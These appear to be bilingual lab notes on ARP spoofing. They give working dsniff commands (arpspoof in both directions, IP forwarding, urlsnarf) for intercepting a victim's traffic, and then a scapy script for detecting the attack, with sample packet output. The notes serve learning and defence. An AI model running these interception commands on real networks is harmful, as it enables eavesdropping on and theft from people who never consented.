Start by running sudo -i to become a root user.
升级一下包管理器:apt-get update
安装:apt-get install dsniff
The dsniff tool contains several useful tools for intercepting network traffic, such as arpspoof
, a tool that executes an ARP spoofing attack.
netdiscover
It issues ARP queries for all possible IP addresses on the subnetwork, and when a machine on the network responds, it records and displays the machine’s MAC address and IP address.
netdiscovery -r 10.10.10.0/24
一旦找到,CTRL+C中断
接下来,让Kali能够转发包
enable IP forwarding by setting the IP forwarding flag:
echo 1 > /proc/sys/net/ipv4/ip_forward
generate multiple fake ARP replies by running the following command:
arpspoof -i eth0 -t <VICTIM_IP> <ROUTER_IP>
-t flag specifies the target
-i flag represents the interface.
0806 is a type field indicating that an ARP packet is contained within the Ethernet frame being transmitted.
42 represents the total number of bytes associated with the Ethernet frame.
also trick the router into believing you’re the victim so that you can intercept incoming internet traffic on the victim’s behalf.
arpspoof -i eth0 -t <ROUTER_IP> <VICTIM_IP>
Extract the URLs by running the following command in a new terminal:(截取eth0的URL包)
kali@kali:~$ sudo urlsnarf -i eth0
检测ARP欺骗攻击:(先安装包)
sudo apt install python3-pip
pip3 install --pre scapy[basic]
后台运行mousepad:mousepad &
from scapy.all import sniff
IP_MAC_MAP = {}
def processPacket(packet):
src_IP = packet['ARP'].psrc
src_MAC = packet['Ether'].src
if src_MAC in IP_MAC_MAP.keys():
if IP_MAC_MAP[src_MAC] != src_IP:
try:
old_IP = IP_MAC_MAP[src_MAC]
except:
old_IP = "unknown"
message = str(old_IP) + "is pretending to " + str(src_IP)
return message
else:
IP_MAC_MAP[src_MAC] = src_IP
sniff(count=0, filter="arp", store=0, prn=processPacket)
我的探索代码,启动监听ARP协议包
from scapy.all import *
def handelPacket(p):
# src_IP = p['ARP'].psrc
# src_MAC = p['Ethernet'].src
# message=str(src_IP)+" : "+str(src_MAC)
# return message
p.show()
sniff(prn=handelPacket, filter="arp", count=0)
linux开启arp伪造攻击:
sudo arpspoof -i eth0 -t 10.10.10.5 10.10.10.1
结果:
###[ Ethernet ]###
dst = 08:00:27:49:84:59
src = 08:00:27:a6:1f:86
type = ARP
###[ ARP ]###
hwtype = 0x1
ptype = IPv4
hwlen = 6
plen = 4
op = who-has
hwsrc = 08:00:27:a6:1f:86
psrc = 10.10.10.7
hwdst = 00:00:00:00:00:00
pdst = 10.10.10.3###[ Ethernet ]###
dst = 08:00:27:a6:1f:86
src = 08:00:27:49:84:59
type = ARP
###[ ARP ]###
hwtype = 0x1
ptype = IPv4
hwlen = 6
plen = 4
op = is-at
hwsrc = 08:00:27:49:84:59
psrc = 10.10.10.3
hwdst = 08:00:27:a6:1f:86
pdst = 10.10.10.7
###[ Padding ]###
load = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'